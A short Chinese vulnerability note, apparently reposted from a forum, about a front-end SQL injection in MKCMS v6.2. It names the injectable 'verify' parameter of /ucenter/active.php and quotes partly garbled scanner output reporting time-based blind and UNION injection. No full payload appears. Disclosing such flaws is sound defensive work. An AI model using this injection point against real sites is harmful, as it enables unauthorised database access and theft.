MKCMS v6.2 /ucenter/active.php前台sql注入漏洞

# MKCMS v6.2 /ucenter/active.php前台sql注入漏洞

> 原文:[https://www.zhihuifly.com/t/topic/3025](https://www.zhihuifly.com/t/topic/3025)

# MKCMS v6.2 /ucenter/active.php前台sql注入漏洞

## 一、漏洞简介

## 二、漏洞影响

MKCMS v6.2

## 三、复现过程

`/ucenter/active.php?verify=1`存在注入

“`
/ucenter/active.php
= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[INFO] GET parameter ‘verify’ is ‘Generic UNION query (NULL) – 1 to 20 columns’ injectable
“`

## 参考链接

> https://xz.aliyun.com/t/7580#toc-4

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容